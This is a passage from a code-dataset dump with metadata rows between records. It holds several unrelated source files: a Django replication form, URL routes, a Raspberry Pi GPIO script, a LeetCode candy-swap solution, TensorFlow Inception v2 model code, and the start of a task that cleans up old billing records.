    def __init__(self, *args, **kwargs):
        """Accept optional 'modes', 'select_mode', 'datasets', 'initial' kwargs."""
        modes = []
        select_mode = None
        datasets = None
        initial = None
        if kwargs:
            if 'modes' in kwargs:
                modes = kwargs.pop('modes')
            if 'select_mode' in kwargs:
                select_mode = str(kwargs.pop('select_mode'))
            if 'datasets' in kwargs:
                datasets = kwargs.pop('datasets')
            if 'initial' in kwargs:
                initial = kwargs.pop('initial')
        super(CreateRemoteReplication, self).__init__(*args, **kwargs)
        # Mode selector choices; a single (None, 'None') entry when empty.
        ch = []
        if modes:
            for mode in modes:
                tup = (mode, mode)
                ch.append(tup)
        else:
            ch.append((None, 'None'))
        self.fields['modes'] = forms.ChoiceField(choices=ch)
        if select_mode:
            self.fields['select_mode'] = forms.CharField(
                initial=str(select_mode))
        if select_mode and select_mode == 'zfs':
            # zfs mode: relax the rsync-only fields and offer the source dataset.
            self.fields['local_path'] = forms.CharField(required=False)
            self.fields['remote_path'] = forms.CharField(required=False)
            self.fields['rsync_type'] = forms.ChoiceField(required=False)
            self.fields['switches'] = forms.MultipleChoiceField(required=False)
            src_ds_ch = []
            if datasets:
                for dataset in datasets:
                    tup = (dataset, dataset)
                    src_ds_ch.append(tup)
            else:
                src_ds_ch.append((None, 'None'))
            self.fields['source_dataset'] = forms.ChoiceField(choices=src_ds_ch)
        if select_mode and select_mode == 'rsync':
            # rsync mode: relax the zfs-only pool field and prefill local_path.
            self.fields['target_pool'] = forms.CharField(
                required=False, initial=None)
            if datasets:
                self.fields['local_path'] = forms.CharField(
                    initial='/%s' % datasets[0])
            else:
                self.fields['local_path'] = forms.CharField(
                    initial='')
    def clean_target_ip(self):
        """Reject 0.0.0.0 except for purely local rsync transfers."""
        target_ip = str(self.cleaned_data['target_ip'])
        rsync_type = str(self.cleaned_data['rsync_type'])
        # if target_ip and rsync_type:
        # if target_ip == '0.0.0.0':
        if target_ip == '0.0.0.0' and rsync_type != 'local':
            self._errors["target_ip"] = self.error_class(
                ["Please provide a valid IP"])
        return target_ip
# vim: tabstop=8 softtabstop=0 expandtab ai shiftwidth=4 smarttab
| [
"ram@fractalio.com"
] | ram@fractalio.com |
dcd6a3c012dc40f933af56f937d8366be20b4fbd | 633a578567b91d7c5e255ad4b15aea9730ad7bd1 | /ToDo/ToDoBox/urls.py | 07f578423dcca78ac26926c295aea8aa92963861 | [] | no_license | Daniel98p/ToDoProject | 7dcd66ec9fa073b4ba7a2a021bc4eb9941aaae66 | 223bcd871cd4000ed9baeeaa959393ba6486bb2e | refs/heads/master | 2022-09-18T04:09:35.709406 | 2020-05-30T15:50:34 | 2020-05-30T15:50:34 | 250,861,691 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 313 | py | from django.urls import path
from . import views
# URL routes for the ToDoBox app; each route name is used for reverse()
# lookups in templates and views.
urlpatterns = [
    # App landing page.
    path('', views.index, name='index'),
    # Delete one todo; <int:obj_id> is presumably the object's primary key
    # (confirm against views.delete_todo).
    path('delete/<int:obj_id>', views.delete_todo, name='delete_todo'),
    path('display/', views.display, name='display'),
    path('activities-chart/', views.activities_chart, name='activities-chart')
]
"danielmichalik98@wp.pl"
] | danielmichalik98@wp.pl |
8bc687a4d4395da2783d0016ec66dbbb5e676f1e | 91f3294f69b254a2a32e92ae87ecc0e4dcf3b82d | /src/GPIO_clean.py | af98e9464cd4e46a33d8426e25ae7f91b993c5cf | [] | no_license | Karijini/photobooth | db7fe003eecb6860b2b44a67ef76f641c60438ad | 128cdce37009e3269cf6bf1a1e653e64afa814f5 | refs/heads/master | 2021-01-10T15:56:31.163671 | 2016-03-31T13:30:41 | 2016-03-31T13:30:41 | 54,665,938 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 210 | py | import RPi.GPIO as GPIO
# Use Broadcom (BCM) channel numbering for all pin references below.
GPIO.setmode(GPIO.BCM)
# Pins 17 and 23 configured as outputs.
GPIO.setup(17,GPIO.OUT)
GPIO.setup(23,GPIO.OUT)
# Pins 4 and 18 configured as inputs with the internal pull-up resistor
# enabled (they read HIGH unless pulled to ground externally).
GPIO.setup(4,GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(18,GPIO.IN, pull_up_down=GPIO.PUD_UP)
# Release all channels configured in this script (RPi.GPIO cleanup).
GPIO.cleanup()
| [
"sebastian.thinnes@gmx.de"
] | sebastian.thinnes@gmx.de |
f514206567ca63e896cbbc56628b8df356f2f308 | c957b4663cc4cb21e5172f23c6989031be8c3e5b | /python/888. Fair Candy Swap.py | 95c36e992773b54e7b4c72dfd9439b8971c51eb4 | [] | no_license | gajanlee/leetcode | e061dc37af0f83bf2bce00c391c0b8a9f3177b22 | 0d3c8477f05604a059e58a8764ce0d8bd418edde | refs/heads/master | 2018-12-26T06:12:24.995542 | 2018-10-30T05:03:27 | 2018-10-30T05:03:27 | 102,965,574 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,393 | py | """
Alice and Bob have candy bars of different sizes: A[i] is the size of the i-th bar of candy that Alice has, and B[j] is the size of the j-th bar of candy that Bob has.
Since they are friends, they would like to exchange one candy bar each so that after the exchange, they both have the same total amount of candy. (The total amount of candy a person has is the sum of the sizes of candy bars they have.)
Return an integer array ans where ans[0] is the size of the candy bar that Alice must exchange, and ans[1] is the size of the candy bar that Bob must exchange.
If there are multiple answers, you may return any one of them. It is guaranteed an answer exists.
Example 1:
Input: A = [1,1], B = [2,2]
Output: [1,2]
Example 2:
Input: A = [1,2], B = [2,3]
Output: [1,2]
Example 3:
Input: A = [2], B = [1,3]
Output: [2,3]
Example 4:
Input: A = [1,2,5], B = [2,4]
Output: [5,4]
Note:
1 <= A.length <= 10000
1 <= B.length <= 10000
1 <= A[i] <= 100000
1 <= B[i] <= 100000
It is guaranteed that Alice and Bob have different total amounts of candy.
It is guaranteed there exists an answer.
"""
class Solution:
    def fairCandySwap(self, A, B):
        """Return [a, b]: Alice gives bar of size a, Bob gives bar of size b,
        so that both end with equal totals.

        Swapping a for b equalizes the sums exactly when
        a - b == (sum(A) - sum(B)) / 2, i.e. a == b + diff.  Build a set of
        Alice's sizes for O(1) membership tests and scan Bob's distinct
        sizes for a match.  Runs in O(len(A) + len(B)) time.

        :type A: List[int]
        :type B: List[int]
        :rtype: List[int]
        """
        diff = (sum(A) - sum(B)) // 2
        sizes_a = set(A)
        for b in set(B):
            a = diff + b
            if a in sizes_a:
                return [a, b]
        # The problem statement guarantees an answer exists; previously this
        # fell through and returned None silently on invalid input.
        raise ValueError('no fair swap exists for the given inputs')
"lee_jiazh@163.com"
] | lee_jiazh@163.com |
d32d96b452aff9a45fc6474cf6c25de294ad52a9 | cb2febe9c45fc50bd8a1f6af39f9a248d56f20d8 | /models/tensorflow/inception_v2.py | 84f4fc4dc6b2e277a8bd1d8c1161a035ba03f143 | [
"Apache-2.0"
] | permissive | mylolis/DLInfBench | 4e837a23edce390709f93e75729e50055fe8da1a | e582c8f06cf766c356f780f5488b287c840e4899 | refs/heads/master | 2022-02-14T08:22:08.754976 | 2019-08-16T06:19:51 | 2019-08-16T06:19:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,763 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains the definition for inception v2 classification network."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from models.tensorflow import inception_utils
# Shorthand for the TF-Slim high-level API used throughout this file.
slim = tf.contrib.slim
# Factory for zero-mean truncated-normal weight initializers with the
# given standard deviation.
trunc_normal = lambda stddev: tf.truncated_normal_initializer(0.0, stddev)
def inception_v2_base(inputs,
                      final_endpoint='Mixed_5c',
                      min_depth=16,
                      depth_multiplier=1.0,
                      scope=None):
  """Inception v2 (6a2).
  Constructs an Inception v2 network from inputs to the given final endpoint.
  This method can construct the network up to the layer inception(5b) as
  described in http://arxiv.org/abs/1502.03167.
  Args:
    inputs: a tensor of shape [batch_size, height, width, channels].
    final_endpoint: specifies the endpoint to construct the network up to. It
      can be one of ['Conv2d_1a_7x7', 'MaxPool_2a_3x3', 'Conv2d_2b_1x1',
      'Conv2d_2c_3x3', 'MaxPool_3a_3x3', 'Mixed_3b', 'Mixed_3c', 'Mixed_4a',
      'Mixed_4b', 'Mixed_4c', 'Mixed_4d', 'Mixed_4e', 'Mixed_5a', 'Mixed_5b',
      'Mixed_5c'].
    min_depth: Minimum depth value (number of channels) for all convolution ops.
      Enforced when depth_multiplier < 1, and not an active constraint when
      depth_multiplier >= 1.
    depth_multiplier: Float multiplier for the depth (number of channels)
      for all convolution ops. The value must be greater than zero. Typical
      usage will be to set this value in (0, 1) to reduce the number of
      parameters or computation cost of the model.
    scope: Optional variable_scope.
  Returns:
    tensor_out: output tensor corresponding to the final_endpoint.
    end_points: a set of activations for external use, for example summaries or
      losses.
  Raises:
    ValueError: if final_endpoint is not set to one of the predefined values,
      or depth_multiplier <= 0
  """
  # end_points will collect relevant activations for external use, for example
  # summaries or losses.
  end_points = {}
  # Used to find thinned depths for each layer.
  if depth_multiplier <= 0:
    raise ValueError('depth_multiplier is not greater than zero.')
  # depth() scales a nominal channel count by depth_multiplier, never
  # dropping below min_depth.
  depth = lambda d: max(int(d * depth_multiplier), min_depth)
  with tf.variable_scope(scope, 'InceptionV2', [inputs]):
    with slim.arg_scope(
        [slim.conv2d, slim.max_pool2d, slim.avg_pool2d, slim.separable_conv2d],
        stride=1, padding='SAME'):
      # Note that sizes in the comments below assume an input spatial size of
      # 224x224, however, the inputs can be of any size greater 32x32.
      # 224 x 224 x 3
      end_point = 'Conv2d_1a_7x7'
      # depthwise_multiplier here is different from depth_multiplier.
      # depthwise_multiplier determines the output channels of the initial
      # depthwise conv (see docs for tf.nn.separable_conv2d), while
      # depth_multiplier controls the # channels of the subsequent 1x1
      # convolution. Must have
      # in_channels * depthwise_multipler <= out_channels
      # so that the separable convolution is not overparameterized.
      depthwise_multiplier = min(int(depth(64) / 3), 8)
      net = slim.separable_conv2d(
          inputs, depth(64), [7, 7], depth_multiplier=depthwise_multiplier,
          stride=2, weights_initializer=trunc_normal(1.0),
          scope=end_point)
      end_points[end_point] = net
      if end_point == final_endpoint: return net, end_points
      # 112 x 112 x 64
      end_point = 'MaxPool_2a_3x3'
      net = slim.max_pool2d(net, [3, 3], scope=end_point, stride=2)
      end_points[end_point] = net
      if end_point == final_endpoint: return net, end_points
      # 56 x 56 x 64
      end_point = 'Conv2d_2b_1x1'
      net = slim.conv2d(net, depth(64), [1, 1], scope=end_point,
                        weights_initializer=trunc_normal(0.1))
      end_points[end_point] = net
      if end_point == final_endpoint: return net, end_points
      # 56 x 56 x 64
      end_point = 'Conv2d_2c_3x3'
      net = slim.conv2d(net, depth(192), [3, 3], scope=end_point)
      end_points[end_point] = net
      if end_point == final_endpoint: return net, end_points
      # 56 x 56 x 192
      end_point = 'MaxPool_3a_3x3'
      net = slim.max_pool2d(net, [3, 3], scope=end_point, stride=2)
      end_points[end_point] = net
      if end_point == final_endpoint: return net, end_points
      # 28 x 28 x 192
      # Inception module.
      end_point = 'Mixed_3b'
      with tf.variable_scope(end_point):
        with tf.variable_scope('Branch_0'):
          branch_0 = slim.conv2d(net, depth(64), [1, 1], scope='Conv2d_0a_1x1')
        with tf.variable_scope('Branch_1'):
          branch_1 = slim.conv2d(
              net, depth(64), [1, 1],
              weights_initializer=trunc_normal(0.09),
              scope='Conv2d_0a_1x1')
          branch_1 = slim.conv2d(branch_1, depth(64), [3, 3],
                                 scope='Conv2d_0b_3x3')
        with tf.variable_scope('Branch_2'):
          branch_2 = slim.conv2d(
              net, depth(64), [1, 1],
              weights_initializer=trunc_normal(0.09),
              scope='Conv2d_0a_1x1')
          branch_2 = slim.conv2d(branch_2, depth(96), [3, 3],
                                 scope='Conv2d_0b_3x3')
          branch_2 = slim.conv2d(branch_2, depth(96), [3, 3],
                                 scope='Conv2d_0c_3x3')
        with tf.variable_scope('Branch_3'):
          branch_3 = slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
          branch_3 = slim.conv2d(
              branch_3, depth(32), [1, 1],
              weights_initializer=trunc_normal(0.1),
              scope='Conv2d_0b_1x1')
        net = tf.concat(axis=3, values=[branch_0, branch_1, branch_2, branch_3])
        end_points[end_point] = net
        if end_point == final_endpoint: return net, end_points
      # 28 x 28 x 256
      end_point = 'Mixed_3c'
      with tf.variable_scope(end_point):
        with tf.variable_scope('Branch_0'):
          branch_0 = slim.conv2d(net, depth(64), [1, 1], scope='Conv2d_0a_1x1')
        with tf.variable_scope('Branch_1'):
          branch_1 = slim.conv2d(
              net, depth(64), [1, 1],
              weights_initializer=trunc_normal(0.09),
              scope='Conv2d_0a_1x1')
          branch_1 = slim.conv2d(branch_1, depth(96), [3, 3],
                                 scope='Conv2d_0b_3x3')
        with tf.variable_scope('Branch_2'):
          branch_2 = slim.conv2d(
              net, depth(64), [1, 1],
              weights_initializer=trunc_normal(0.09),
              scope='Conv2d_0a_1x1')
          branch_2 = slim.conv2d(branch_2, depth(96), [3, 3],
                                 scope='Conv2d_0b_3x3')
          branch_2 = slim.conv2d(branch_2, depth(96), [3, 3],
                                 scope='Conv2d_0c_3x3')
        with tf.variable_scope('Branch_3'):
          branch_3 = slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
          branch_3 = slim.conv2d(
              branch_3, depth(64), [1, 1],
              weights_initializer=trunc_normal(0.1),
              scope='Conv2d_0b_1x1')
        net = tf.concat(axis=3, values=[branch_0, branch_1, branch_2, branch_3])
        end_points[end_point] = net
        if end_point == final_endpoint: return net, end_points
      # 28 x 28 x 320
      # Grid-size reduction module: stride-2 conv branches plus a stride-2
      # max-pool shrink the feature map 28x28 -> 14x14 (see size comments).
      end_point = 'Mixed_4a'
      with tf.variable_scope(end_point):
        with tf.variable_scope('Branch_0'):
          branch_0 = slim.conv2d(
              net, depth(128), [1, 1],
              weights_initializer=trunc_normal(0.09),
              scope='Conv2d_0a_1x1')
          branch_0 = slim.conv2d(branch_0, depth(160), [3, 3], stride=2,
                                 scope='Conv2d_1a_3x3')
        with tf.variable_scope('Branch_1'):
          branch_1 = slim.conv2d(
              net, depth(64), [1, 1],
              weights_initializer=trunc_normal(0.09),
              scope='Conv2d_0a_1x1')
          branch_1 = slim.conv2d(
              branch_1, depth(96), [3, 3], scope='Conv2d_0b_3x3')
          branch_1 = slim.conv2d(
              branch_1, depth(96), [3, 3], stride=2, scope='Conv2d_1a_3x3')
        with tf.variable_scope('Branch_2'):
          branch_2 = slim.max_pool2d(
              net, [3, 3], stride=2, scope='MaxPool_1a_3x3')
        net = tf.concat(axis=3, values=[branch_0, branch_1, branch_2])
        end_points[end_point] = net
        if end_point == final_endpoint: return net, end_points
      # 14 x 14 x 576
      end_point = 'Mixed_4b'
      with tf.variable_scope(end_point):
        with tf.variable_scope('Branch_0'):
          branch_0 = slim.conv2d(net, depth(224), [1, 1], scope='Conv2d_0a_1x1')
        with tf.variable_scope('Branch_1'):
          branch_1 = slim.conv2d(
              net, depth(64), [1, 1],
              weights_initializer=trunc_normal(0.09),
              scope='Conv2d_0a_1x1')
          branch_1 = slim.conv2d(
              branch_1, depth(96), [3, 3], scope='Conv2d_0b_3x3')
        with tf.variable_scope('Branch_2'):
          branch_2 = slim.conv2d(
              net, depth(96), [1, 1],
              weights_initializer=trunc_normal(0.09),
              scope='Conv2d_0a_1x1')
          branch_2 = slim.conv2d(branch_2, depth(128), [3, 3],
                                 scope='Conv2d_0b_3x3')
          branch_2 = slim.conv2d(branch_2, depth(128), [3, 3],
                                 scope='Conv2d_0c_3x3')
        with tf.variable_scope('Branch_3'):
          branch_3 = slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
          branch_3 = slim.conv2d(
              branch_3, depth(128), [1, 1],
              weights_initializer=trunc_normal(0.1),
              scope='Conv2d_0b_1x1')
        net = tf.concat(axis=3, values=[branch_0, branch_1, branch_2, branch_3])
        end_points[end_point] = net
        if end_point == final_endpoint: return net, end_points
      # 14 x 14 x 576
      end_point = 'Mixed_4c'
      with tf.variable_scope(end_point):
        with tf.variable_scope('Branch_0'):
          branch_0 = slim.conv2d(net, depth(192), [1, 1], scope='Conv2d_0a_1x1')
        with tf.variable_scope('Branch_1'):
          branch_1 = slim.conv2d(
              net, depth(96), [1, 1],
              weights_initializer=trunc_normal(0.09),
              scope='Conv2d_0a_1x1')
          branch_1 = slim.conv2d(branch_1, depth(128), [3, 3],
                                 scope='Conv2d_0b_3x3')
        with tf.variable_scope('Branch_2'):
          branch_2 = slim.conv2d(
              net, depth(96), [1, 1],
              weights_initializer=trunc_normal(0.09),
              scope='Conv2d_0a_1x1')
          branch_2 = slim.conv2d(branch_2, depth(128), [3, 3],
                                 scope='Conv2d_0b_3x3')
          branch_2 = slim.conv2d(branch_2, depth(128), [3, 3],
                                 scope='Conv2d_0c_3x3')
        with tf.variable_scope('Branch_3'):
          branch_3 = slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
          branch_3 = slim.conv2d(
              branch_3, depth(128), [1, 1],
              weights_initializer=trunc_normal(0.1),
              scope='Conv2d_0b_1x1')
        net = tf.concat(axis=3, values=[branch_0, branch_1, branch_2, branch_3])
        end_points[end_point] = net
        if end_point == final_endpoint: return net, end_points
      # 14 x 14 x 576
      end_point = 'Mixed_4d'
      with tf.variable_scope(end_point):
        with tf.variable_scope('Branch_0'):
          branch_0 = slim.conv2d(net, depth(160), [1, 1], scope='Conv2d_0a_1x1')
        with tf.variable_scope('Branch_1'):
          branch_1 = slim.conv2d(
              net, depth(128), [1, 1],
              weights_initializer=trunc_normal(0.09),
              scope='Conv2d_0a_1x1')
          branch_1 = slim.conv2d(branch_1, depth(160), [3, 3],
                                 scope='Conv2d_0b_3x3')
        with tf.variable_scope('Branch_2'):
          branch_2 = slim.conv2d(
              net, depth(128), [1, 1],
              weights_initializer=trunc_normal(0.09),
              scope='Conv2d_0a_1x1')
          branch_2 = slim.conv2d(branch_2, depth(160), [3, 3],
                                 scope='Conv2d_0b_3x3')
          branch_2 = slim.conv2d(branch_2, depth(160), [3, 3],
                                 scope='Conv2d_0c_3x3')
        with tf.variable_scope('Branch_3'):
          branch_3 = slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
          branch_3 = slim.conv2d(
              branch_3, depth(96), [1, 1],
              weights_initializer=trunc_normal(0.1),
              scope='Conv2d_0b_1x1')
        net = tf.concat(axis=3, values=[branch_0, branch_1, branch_2, branch_3])
        end_points[end_point] = net
        if end_point == final_endpoint: return net, end_points
      # 14 x 14 x 576
      end_point = 'Mixed_4e'
      with tf.variable_scope(end_point):
        with tf.variable_scope('Branch_0'):
          branch_0 = slim.conv2d(net, depth(96), [1, 1], scope='Conv2d_0a_1x1')
        with tf.variable_scope('Branch_1'):
          branch_1 = slim.conv2d(
              net, depth(128), [1, 1],
              weights_initializer=trunc_normal(0.09),
              scope='Conv2d_0a_1x1')
          branch_1 = slim.conv2d(branch_1, depth(192), [3, 3],
                                 scope='Conv2d_0b_3x3')
        with tf.variable_scope('Branch_2'):
          branch_2 = slim.conv2d(
              net, depth(160), [1, 1],
              weights_initializer=trunc_normal(0.09),
              scope='Conv2d_0a_1x1')
          branch_2 = slim.conv2d(branch_2, depth(192), [3, 3],
                                 scope='Conv2d_0b_3x3')
          branch_2 = slim.conv2d(branch_2, depth(192), [3, 3],
                                 scope='Conv2d_0c_3x3')
        with tf.variable_scope('Branch_3'):
          branch_3 = slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
          branch_3 = slim.conv2d(
              branch_3, depth(96), [1, 1],
              weights_initializer=trunc_normal(0.1),
              scope='Conv2d_0b_1x1')
        net = tf.concat(axis=3, values=[branch_0, branch_1, branch_2, branch_3])
        end_points[end_point] = net
        if end_point == final_endpoint: return net, end_points
      # 14 x 14 x 576
      # Second grid-size reduction module: 14x14 -> 7x7 (see size comments).
      end_point = 'Mixed_5a'
      with tf.variable_scope(end_point):
        with tf.variable_scope('Branch_0'):
          branch_0 = slim.conv2d(
              net, depth(128), [1, 1],
              weights_initializer=trunc_normal(0.09),
              scope='Conv2d_0a_1x1')
          branch_0 = slim.conv2d(branch_0, depth(192), [3, 3], stride=2,
                                 scope='Conv2d_1a_3x3')
        with tf.variable_scope('Branch_1'):
          branch_1 = slim.conv2d(
              net, depth(192), [1, 1],
              weights_initializer=trunc_normal(0.09),
              scope='Conv2d_0a_1x1')
          branch_1 = slim.conv2d(branch_1, depth(256), [3, 3],
                                 scope='Conv2d_0b_3x3')
          branch_1 = slim.conv2d(branch_1, depth(256), [3, 3], stride=2,
                                 scope='Conv2d_1a_3x3')
        with tf.variable_scope('Branch_2'):
          branch_2 = slim.max_pool2d(net, [3, 3], stride=2,
                                     scope='MaxPool_1a_3x3')
        net = tf.concat(axis=3, values=[branch_0, branch_1, branch_2])
        end_points[end_point] = net
        if end_point == final_endpoint: return net, end_points
      # 7 x 7 x 1024
      end_point = 'Mixed_5b'
      with tf.variable_scope(end_point):
        with tf.variable_scope('Branch_0'):
          branch_0 = slim.conv2d(net, depth(352), [1, 1], scope='Conv2d_0a_1x1')
        with tf.variable_scope('Branch_1'):
          branch_1 = slim.conv2d(
              net, depth(192), [1, 1],
              weights_initializer=trunc_normal(0.09),
              scope='Conv2d_0a_1x1')
          branch_1 = slim.conv2d(branch_1, depth(320), [3, 3],
                                 scope='Conv2d_0b_3x3')
        with tf.variable_scope('Branch_2'):
          branch_2 = slim.conv2d(
              net, depth(160), [1, 1],
              weights_initializer=trunc_normal(0.09),
              scope='Conv2d_0a_1x1')
          branch_2 = slim.conv2d(branch_2, depth(224), [3, 3],
                                 scope='Conv2d_0b_3x3')
          branch_2 = slim.conv2d(branch_2, depth(224), [3, 3],
                                 scope='Conv2d_0c_3x3')
        with tf.variable_scope('Branch_3'):
          branch_3 = slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
          branch_3 = slim.conv2d(
              branch_3, depth(128), [1, 1],
              weights_initializer=trunc_normal(0.1),
              scope='Conv2d_0b_1x1')
        net = tf.concat(axis=3, values=[branch_0, branch_1, branch_2, branch_3])
        end_points[end_point] = net
        if end_point == final_endpoint: return net, end_points
      # 7 x 7 x 1024
      end_point = 'Mixed_5c'
      with tf.variable_scope(end_point):
        with tf.variable_scope('Branch_0'):
          branch_0 = slim.conv2d(net, depth(352), [1, 1], scope='Conv2d_0a_1x1')
        with tf.variable_scope('Branch_1'):
          branch_1 = slim.conv2d(
              net, depth(192), [1, 1],
              weights_initializer=trunc_normal(0.09),
              scope='Conv2d_0a_1x1')
          branch_1 = slim.conv2d(branch_1, depth(320), [3, 3],
                                 scope='Conv2d_0b_3x3')
        with tf.variable_scope('Branch_2'):
          branch_2 = slim.conv2d(
              net, depth(192), [1, 1],
              weights_initializer=trunc_normal(0.09),
              scope='Conv2d_0a_1x1')
          branch_2 = slim.conv2d(branch_2, depth(224), [3, 3],
                                 scope='Conv2d_0b_3x3')
          branch_2 = slim.conv2d(branch_2, depth(224), [3, 3],
                                 scope='Conv2d_0c_3x3')
        with tf.variable_scope('Branch_3'):
          # Note: unlike Mixed_5b, the pooling branch here uses max pooling.
          branch_3 = slim.max_pool2d(net, [3, 3], scope='MaxPool_0a_3x3')
          branch_3 = slim.conv2d(
              branch_3, depth(128), [1, 1],
              weights_initializer=trunc_normal(0.1),
              scope='Conv2d_0b_1x1')
        net = tf.concat(axis=3, values=[branch_0, branch_1, branch_2, branch_3])
        end_points[end_point] = net
        if end_point == final_endpoint: return net, end_points
    raise ValueError('Unknown final endpoint %s' % final_endpoint)
def inception_v2(inputs,
                 num_classes=1000,
                 is_training=True,
                 dropout_keep_prob=0.8,
                 min_depth=16,
                 depth_multiplier=1.0,
                 prediction_fn=slim.softmax,
                 spatial_squeeze=True,
                 reuse=None,
                 scope='InceptionV2'):
  """Inception v2 model for classification.
  Constructs an Inception v2 network for classification as described in
  http://arxiv.org/abs/1502.03167.
  The default image size used to train this network is 224x224.
  Args:
    inputs: a tensor of shape [batch_size, height, width, channels].
    num_classes: number of predicted classes.
    is_training: whether is training or not.
    dropout_keep_prob: the percentage of activation values that are retained.
    min_depth: Minimum depth value (number of channels) for all convolution ops.
      Enforced when depth_multiplier < 1, and not an active constraint when
      depth_multiplier >= 1.
    depth_multiplier: Float multiplier for the depth (number of channels)
      for all convolution ops. The value must be greater than zero. Typical
      usage will be to set this value in (0, 1) to reduce the number of
      parameters or computation cost of the model.
    prediction_fn: a function to get predictions out of logits.
    spatial_squeeze: if True, logits is of shape [B, C], if false logits is
        of shape [B, 1, 1, C], where B is batch_size and C is number of classes.
    reuse: whether or not the network and its variables should be reused. To be
      able to reuse 'scope' must be given.
    scope: Optional variable_scope.
  Returns:
    logits: the pre-softmax activations, a tensor of size
      [batch_size, num_classes]
    end_points: a dictionary from components of the network to the corresponding
      activation.
  Raises:
    ValueError: if final_endpoint is not set to one of the predefined values,
      or depth_multiplier <= 0
  """
  if depth_multiplier <= 0:
    raise ValueError('depth_multiplier is not greater than zero.')
  # Final pooling and prediction
  with tf.variable_scope(scope, 'InceptionV2', [inputs, num_classes],
                         reuse=reuse) as scope:
    with slim.arg_scope([slim.batch_norm, slim.dropout],
                        is_training=is_training):
      net, end_points = inception_v2_base(
          inputs, scope=scope, min_depth=min_depth,
          depth_multiplier=depth_multiplier)
      with tf.variable_scope('Logits'):
        # Global average pooling; the kernel is clamped for inputs whose
        # spatial size is smaller than the nominal 7x7 feature map.
        kernel_size = _reduced_kernel_size_for_small_input(net, [7, 7])
        net = slim.avg_pool2d(net, kernel_size, padding='VALID',
                              scope='AvgPool_1a_{}x{}'.format(*kernel_size))
        # 1 x 1 x 1024
        net = slim.dropout(net, keep_prob=dropout_keep_prob, scope='Dropout_1b')
        # 1x1 convolution over the pooled 1x1 map plays the role of the
        # final fully connected layer.
        logits = slim.conv2d(net, num_classes, [1, 1], activation_fn=None,
                             normalizer_fn=None, scope='Conv2d_1c_1x1')
        if spatial_squeeze:
          logits = tf.squeeze(logits, [1, 2], name='SpatialSqueeze')
      end_points['Logits'] = logits
      end_points['Predictions'] = prediction_fn(logits, scope='Predictions')
  return logits, end_points
# Spatial input size the network was trained with (see docstring above).
inception_v2.default_image_size = 224
def _reduced_kernel_size_for_small_input(input_tensor, kernel_size):
"""Define kernel size which is automatically reduced for small input.
If the shape of the input images is unknown at graph construction time this
function assumes that the input images are is large enough.
Args:
input_tensor: input tensor of size [batch_size, height, width, channels].
kernel_size: desired kernel size of length 2: [kernel_height, kernel_width]
Returns:
a tensor with the kernel size.
TODO(jrru): Make this function work with unknown shapes. Theoretically, this
can be done with the code below. Problems are two-fold: (1) If the shape was
known, it will be lost. (2) inception.slim.ops._two_element_tuple cannot
handle tensors that define the kernel size.
shape = tf.shape(input_tensor)
return = tf.pack([tf.minimum(shape[1], kernel_size[0]),
tf.minimum(shape[2], kernel_size[1])])
"""
shape = input_tensor.get_shape().as_list()
if shape[1] is None or shape[2] is None:
kernel_size_out = kernel_size
else:
kernel_size_out = [min(shape[1], kernel_size[0]),
min(shape[2], kernel_size[1])]
return kernel_size_out
# Re-export the shared Inception arg scope so callers can configure this
# network the same way as the other Inception variants.
inception_v2_arg_scope = inception_utils.inception_arg_scope
| [
"shiyemin2@qq.com"
] | shiyemin2@qq.com |
f9285da227e9420e40a24aa622a62fb9b72b2f6a | df44affab179c2546fb3e0d1dc29eebcfdf51c1c | /toughradius/modules/tasks/clean_billing.py | 5ab17ac1aa2881f6590a917b6c8fb1e0cfa53ef6 | [] | no_license | sailorhdx/taurusradius | 121c508e7faffaddcd5326d2b6d3710eaf0ed08e | 92d30820611a0c9102ae41713ea3c35437a3c6ee | refs/heads/master | 2021-01-22T02:28:31.543338 | 2017-06-17T02:15:33 | 2017-06-17T02:15:33 | 92,362,551 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,619 | py | #!/usr/bin/env python
# coding=utf-8
import os
import sys
import time
import datetime
from toughradius.toughlib import utils
from toughradius.toughlib import dispatch, logger
from toughradius.toughlib.dbutils import make_db
from toughradius.modules import models
from toughradius.toughlib.db_backup import DBBackup
from toughradius.modules.tasks.task_base import TaseBasic
from twisted.internet import reactor
from toughradius.modules import taskd
class ClearBillingTask(TaseBasic):
    """Periodic task that purges billing-cache rows (TrBilling) older than
    seven days."""
    # Task identifier used by the task daemon.
    __name__ = 'billing-clean'
    def __init__(self, taskd, **kwargs):
        TaseBasic.__init__(self, taskd, **kwargs)
    def get_next_interval(self):
        # Run once per day (value in seconds).
        return 86400
    def first_delay(self):
        # Wait two minutes after startup before the first run (seconds).
        return 120
    def process(self, *args, **kwargs):
        """Delete TrBilling rows created more than seven days ago.

        Returns the number of seconds until the next scheduled run.
        Failures are logged and swallowed so the task keeps rescheduling.
        """
        self.logtimes()
        next_interval = self.get_next_interval()
        with make_db(self.db) as db:
            try:
                td = datetime.timedelta(days=7)
                _now = datetime.datetime.now()
                # Cut-off is the end of the day seven days ago, compared as a
                # string against create_time.
                edate = (_now - td).strftime('%Y-%m-%d 23:59:59')
                db.query(models.TrBilling).filter(models.TrBilling.create_time < edate).delete()
                db.commit()
                logger.info(u'计费缓存数据清理完成,下次执行还需等待 %s' % self.format_time(next_interval), trace='task')
            except Exception as err:
